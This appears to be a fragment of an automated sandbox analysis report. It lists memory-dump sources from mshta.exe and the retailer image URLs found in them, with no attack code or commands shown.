Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484103441.0000000009463000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-LEVE_PAGUE-1678818a0085
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OBACUPOM-2e7e4e4c39b5.p
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484103441.0000000009463000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460101803.000000000AC8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463535902.000000000AC8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555a
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.0000000009580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png/#4
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngG
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngw
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409811303.0000000009537000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000953A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.png
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.png)
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.pngx
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.0000000009516000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-ELETROPORTATEIS-bfaadadd69a1.p
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485122027.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409658561.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png2400c3.
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.0000000009580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngI
Source: mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pnguq
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngw3
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png.
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png0
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png1_0
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png5
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngend
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngwww
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 